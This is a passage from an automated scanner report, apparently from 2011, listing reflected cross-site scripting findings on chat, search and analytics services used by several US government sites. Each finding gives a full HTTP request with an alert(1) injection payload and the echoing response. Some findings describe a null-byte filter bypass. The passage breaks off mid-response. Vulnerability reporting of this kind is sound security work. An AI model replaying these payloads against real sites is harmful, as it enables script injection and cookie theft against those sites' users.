Path:   /js/hic/safe-standard.js

Issue detail

The value of the offline-image request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc550'%3balert(1)//5fb7e8addbb was submitted in the offline-image parameter. This input was echoed as fc550';alert(1)//5fb7e8addbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.giffc550'%3balert(1)//5fb7e8addbb HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=JeUKDNrsBTvD;Path=/;Domain=.providesupport.com
Content-Length: 4989
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "JeUKDNrsBTvD";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
<img name="psMygbimage" src="http://www.ehawaii.gov/dakine/images/portal-offline.giffc550';alert(1)//5fb7e8addbb" border="0">
...[SNIP]...

3.45. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the offline-image request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44157"%3balert(1)//7ed92f9d11a was submitted in the offline-image parameter. This input was echoed as 44157";alert(1)//7ed92f9d11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif44157"%3balert(1)//7ed92f9d11a HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=9kuM6onKqeiW;Path=/;Domain=.providesupport.com
Content-Length: 4989
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "9kuM6onKqeiW";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
bco() {
   var w1 = psMygbci.width - 1;
   psMygbol = (w1 & 1) != 0;
   psMygbsb(psMygbol ? "http://www.ehawaii.gov/dakine/images/portal-online.gif" : "http://www.ehawaii.gov/dakine/images/portal-offline.gif44157";alert(1)//7ed92f9d11a");
   psMygbscf((w1 & 2) != 0);
   var h = psMygbci.height;
   if (h != 2) {
       psMygbop = false;
   } else if ((h == 2) && (!psMygbop)) {
       psMygbop = true;
       psMygbsi();
   }
}
var psMygbci = new Image();
psMy
...[SNIP]...

3.46. http://image.providesupport.com/js/hic/safe-standard.js [online-image parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the online-image request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c28"%3balert(1)//0fbcdd205b5 was submitted in the online-image parameter. This input was echoed as d1c28";alert(1)//0fbcdd205b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gifd1c28"%3balert(1)//0fbcdd205b5&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=egvv6GBH2Aoz;Path=/;Domain=.providesupport.com
Content-Length: 4905
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "egvv6GBH2Aoz";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
bd.innerHTML = '';
   }
}
var psMygbop = false;
function psMygbco() {
   var w1 = psMygbci.width - 1;
   psMygbol = (w1 & 1) != 0;
   psMygbsb(psMygbol ? "http://www.ehawaii.gov/dakine/images/portal-online.gifd1c28";alert(1)//0fbcdd205b5" : "http://www.ehawaii.gov/dakine/images/portal-offline.gif");
   psMygbscf((w1 & 2) != 0);
   var h = psMygbci.height;
   if (h != 2) {
       psMygbop = false;
   } else if ((h == 2) && (!psMygbop)) {
       psMygbop
...[SNIP]...

3.47. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1fbe<script>alert(1)</script>2a480ed2356 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsf1fbe<script>alert(1)</script>2a480ed2356/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:18:29 GMT
Content-Length: 565

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsf1fbe<script>alert(1)</script>2a480ed2356/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live Chat Help&offline-link-html=Live Chat Help
</pre>
...[SNIP]...

3.48. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32c6b<a>696019657e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:18:29 GMT
Content-Length: 551

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help
</pre>
...[SNIP]...

3.49. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload %002a52b<script>alert(1)</script>bdcb3d65d59 was submitted in the callback parameter. This input was echoed as 2a52b<script>alert(1)</script>bdcb3d65d59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0&count=3&format=json&callback=RNTFeed.readers[0].onCompleteJSON%002a52b<script>alert(1)</script>bdcb3d65d59 HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:39:06 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1083
RNT-Time: D=94886 t=1304127546706345
RNT-Machine: 02
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onCompleteJSON.2a52b<script>alert(1)</script>bdcb3d65d59( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_created=1175614633","title":"How do I fi
...[SNIP]...

3.50. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001daec<script>alert(1)</script>9ac6432b159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1daec<script>alert(1)</script>9ac6432b159 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0&count=3&format=json&callback=RNTFeed.readers[0].onComplete/%001daec<script>alert(1)</script>9ac6432b159JSON HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:40:07 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1084
RNT-Time: D=93452 t=1304127607569699
RNT-Machine: 10
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onComplete/.1daec<script>alert(1)</script>9ac6432b159JSON( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_created=1175614633","title":"How do
...[SNIP]...

3.51. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [startIndex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The value of the startIndex request parameter is copied into the HTML document as plain text between tags. The payload %002165b<img%20src%3da%20onerror%3dalert(1)>a528da63fb2 was submitted in the startIndex parameter. This input was echoed as 2165b<img src=a onerror=alert(1)>a528da63fb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0%002165b<img%20src%3da%20onerror%3dalert(1)>a528da63fb2&count=3&format=json&callback=RNTFeed.readers[0].onCompleteJSON HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:12 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1091
RNT-Time: D=114668 t=1304127492040349
RNT-Machine: 10
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onCompleteJSON( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_create
...[SNIP]...
RSS","link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_alp.php","description":"RightNow Technologies Knowledgebase OpenSearch Feed (RSS)","totalResults":1372,"startIndex":"0\u00002165b<img src=a onerror=alert(1)>a528da63fb2","itemsPerPage":"3"} );

3.52. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5b3"><script>alert(1)</script>40609c1b37a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?4c5b3"><script>alert(1)</script>40609c1b37a=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 30 Apr 2011 12:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&4c5b3"><script>alert(1)</script>40609c1b37a=1" type="text/css" media="all" />
...[SNIP]...

3.53. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kodakimagingnetworki.tt.omtrdc.net
Path:   /m2/kodakimagingnetworki/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 3535b<script>alert(1)</script>46afbb97bb6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kodakimagingnetworki/mbox/standard?mboxHost=www.kodakgallery.com&mboxSession=1304176122561-938029&mboxPage=1304176122561-938029&screenHeight=1200&screenWidth=1920&browserWidth=998&browserHeight=935&browserTimeOffset=-300&colorDepth=16&mboxCount=2&sourceId=700019816903&mbox=LandingPageMbox3535b<script>alert(1)</script>46afbb97bb6&mboxId=0&mboxTime=1304158124644&mboxURL=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F43&mboxVersion=40 HTTP/1.1
Host: kodakimagingnetworki.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 211
Date: Sat, 30 Apr 2011 15:09:12 GMT
Server: Test & Target

mboxFactories.get('default').get('LandingPageMbox3535b<script>alert(1)</script>46afbb97bb6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1304176122561-938029.17");

3.54. http://landmark-project.com/feed2js/feed2js.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://landmark-project.com
Path:   /feed2js/feed2js.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8c7'%3balert(1)//d5298991925 was submitted in the src parameter. This input was echoed as 5a8c7';alert(1)//d5298991925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed2js/feed2js.php?src=http%3A%2F%2Fcoemergency.blogspot.com%2Ffeeds%2Fposts%2Fdefault5a8c7'%3balert(1)//d5298991925&num=5&date=y&html=p HTTP/1.1
Host: landmark-project.com
Proxy-Connection: keep-alive
Referer: http://dola.colorado.gov/dem/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 775
Content-Type: text/html; charset=UTF-8

document.write('<div class="rss-box">');
document.write('<p class="rss-item"><em>Error:</em> Feed failed! Causes may be (1) No data found for RSS feed http://coemergency.blogspot.com/feeds/posts/default5a8c7';alert(1)//d5298991925; (2) There are no items are available for this feed; (3) The RSS feed does not validate.<br />
...[SNIP]...

3.55. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0096<img%20src%3da%20onerror%3dalert(1)>006acc3c9a9 was submitted in the REST URL parameter 2. This input was echoed as a0096<img src=a onerror=alert(1)>006acc3c9a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /servlet/lhBrowsea0096<img%20src%3da%20onerror%3dalert(1)>006acc3c9a9?ACTION=BTNREFRESH&RND=0.4528236691839993&p=Iowa.gov&c=1099892&b=company&g=Information%2520Services&op=&PAGEVISIT=true&r=1.442691869335249&a=Netscape&v=5&pl=Win32&dm=ia.gov&rf=http%3A//ia.gov/&tl=Iowa.gov%20LiveHelp&cs=true&pg=http%3A//ia.gov/livehelp.html&sd1=1156x1920&sd2=16&jsv=undefined&ps=&lot=1304161964473&ll=undefined&LC=1&pullFailed=0&nocache=0.2693614396266639&id=0&noCacheIE=1304161981692 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: searsTest=TEST

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:22:15 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 101

Error. The file was not found. (servlet name = lhBrowsea0096<img src=a onerror=alert(1)>006acc3c9a9)

3.56. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9383a<a>7d6250d00fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servlet/lhBrowse9383a<a>7d6250d00fe HTTP/1.1
Host: newbrowse.livehelper.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: searsTest=TEST; st1099892=135396595z2011-04-30 06:12:09z;

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 12:23:35 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Content-Length: 76

Error. The file was not found. (servlet name = lhBrowse9383a<a>7d6250d00fe)

3.57. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65f8b<a%20b%3dc>8434f8e4e43 was submitted in the REST URL parameter 2. This input was echoed as 65f8b<a b=c>8434f8e4e43 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servlet/lhBrowse65f8b<a%20b%3dc>8434f8e4e43?ACTION=BTNINIT&c=1099892&b=company&g=Information%2520Services&op=&p=Iowa.gov&RND=0.4528236691839993&nocache=0.9521570026408881&id=0&noCacheIE=1304161966682 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 80

Error. The file was not found. (servlet name = lhBrowse65f8b<a b=c>8434f8e4e43)

3.58. http://newbrowse.livehelper.com/servlet/lhBrowse [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of the id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 13e0d%3balert(1)//eb39e32ae0d was submitted in the id parameter. This input was echoed as 13e0d;alert(1)//eb39e32ae0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/lhBrowse?ACTION=BTNINIT&c=1099892&b=company&g=Information%2520Services&op=&p=Iowa.gov&RND=0.4528236691839993&nocache=0.9521570026408881&id=013e0d%3balert(1)//eb39e32ae0d&noCacheIE=1304161966682 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:40 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: ASP.NET
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: searsTest=TEST; domain=.livehelper.com
Content-Length: 199

var obj;var str ={"opstatus":0,"windowsize":1,"validity":1, "ispulled":null};obj = eval(str);var id = parseInt(013e0d;alert(1)//eb39e32ae0d);eval(pool[013e0d;alert(1)//eb39e32ae0d].getCallback(obj));

3.59. http://newchat.livehelper.com/servlet/lhChat [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newchat.livehelper.com
Path:   /servlet/lhChat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca390<img%20src%3da%20onerror%3dalert(1)>f446d719da6 was submitted in the REST URL parameter 2. This input was echoed as ca390<img src=a onerror=alert(1)>f446d719da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /servlet/lhChatca390<img%20src%3da%20onerror%3dalert(1)>f446d719da6?ACTION=GETWINDOWSIZE&c=1099892&id=0&noCacheIE=1304161966682 HTTP/1.1
Host: newchat.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
